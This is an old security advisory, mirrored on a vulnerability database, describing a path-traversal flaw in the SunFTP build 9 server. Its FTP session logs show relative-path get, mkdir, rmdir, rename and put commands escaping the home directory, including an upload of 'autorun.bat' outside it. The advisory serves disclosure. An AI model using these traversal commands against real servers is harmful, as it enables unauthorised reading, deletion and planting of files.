Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:1343
HistoryMar 03, 2001 - 12:00 a.m.

Sunftp build9(1) - ftp server Vulnerability

2001-03-0300:00:00
vulners.com
16
JSON

It is possible to break out of the root directory by
using relative paths

e:\crap was used as homedir. of user test.

#the get command#

getting files from outside of the root dir.

220 chris FTP Server (SunFTP b9) ready on port 21…
Benutzer (10.17.3.44:(none)): test
331 Password required for test.
Kennwort:
230 User test logged in.
ftp> dir
200 Port command successful.
150 Opening data connection for directory list.
drw-rw-rw- 1 ftp ftp 0 Feb 28 13:46 .
drw-rw-rw- 1 ftp ftp 0 Feb 28 13:46 …
-rw-rw-rw- 1 ftp ftp 0 Mar 02 11:21 test.txt
226 File sent ok
FTP: 179 Bytes empfangen in 0,00Sekunden
179000,00KB/s
ftp> cd …
501 CWD failed. No permission
ftp> get …/sunftptest.txt
200 Port command successful.
150 Opening data connection for …/sunftptest.txt.
226 File sent ok
FTP: 1443 Bytes empfangen in 0,00Sekunden
1443000,00KB/s

#the mkdir command#

without priv. to create directories:

ftp> mkdir test
550 '/test': can't create directory.
ftp> mkdir …/test
257 '/…/test': directory created.

hell!it's getting worse…

#the rmdir command#

without any priv. to remove anything

ftp> rmdir …/test
250 '/…/test': directory removed.

this only works with empty directories

#the rename command#

it is possible to rename files outside of the root
directory without
permissions.And it is also possible to move files with
the rename command,
when the filename is known.

ftp> dir
200 Port command successful.
150 Opening data connection for directory list.
drw-rw-rw- 1 ftp ftp 0 Feb 28 13:46 .
drw-rw-rw- 1 ftp ftp 0 Feb 28 13:46 …
-rw-rw-rw- 1 ftp ftp 0 Mar 02 11:21
grmbl.txt
drw-rw-rw- 1 ftp ftp 0 Mar 02 12:17 test
226 File sent ok
FTP: 240 Bytes empfangen in 0,00Sekunden
240000,00KB/s
ftp> cd …
501 CWD failed. No permission
ftp> rename …/sunftptest.txt movedtohomedir.txt
350 File exists, ready for destination name.
250 File '/…/sunftptest.txt' renamed
to '/movedtohomedir.txt'.
ftp> dir
200 Port command successful.
150 Opening data connection for directory list.
drw-rw-rw- 1 ftp ftp 0 Feb 28 13:46 .
drw-rw-rw- 1 ftp ftp 0 Feb 28 13:46 …
-rw-rw-rw- 1 ftp ftp 0 Mar 02 11:21
grmbl.txt
drw-rw-rw- 1 ftp ftp 0 Mar 02 12:17 test
-rw-rw-rw- 1 ftp ftp 6 Mar 02 12:33
movedtohomedir.txt
226 File sent ok
FTP: 314 Bytes empfangen in 0,00Sekunden
314000,00KB/s

#the put command#

If you have permission to upload files, you can put
these files outside of
the homedir.

ftp> dir
200 Port command successful.
150 Opening data connection for directory list.
drw-rw-rw- 1 ftp ftp 0 Feb 28 13:46 .
drw-rw-rw- 1 ftp ftp 0 Feb 28 13:46 …
-rw-rw-rw- 1 ftp ftp 0 Mar 02 11:21
grmbl.txt
drw-rw-rw- 1 ftp ftp 0 Mar 02 12:17 test
-rw-rw-rw- 1 ftp ftp 6 Mar 02 12:33
movedtohomedir.txt
226 File sent ok
FTP: 314 Bytes empfangen in 0,00Sekunden
314000,00KB/s
ftp> put
Lokale Datei c:\test.txt
Remotedatei test.txt
200 Port command successful.
150 Opening data connection for test.txt.
226 File received ok
ftp> put
Lokale Datei c:\test.txt
Remotedatei …/autorun.bat
200 Port command successful.
150 Opening data connection for …/autorun.bat.
226 File received ok

Solution

no quick bugfix. Use with care

I tried to contact the authors, but their webpage
seems to be down.

[email protected] or
[email protected]

JSON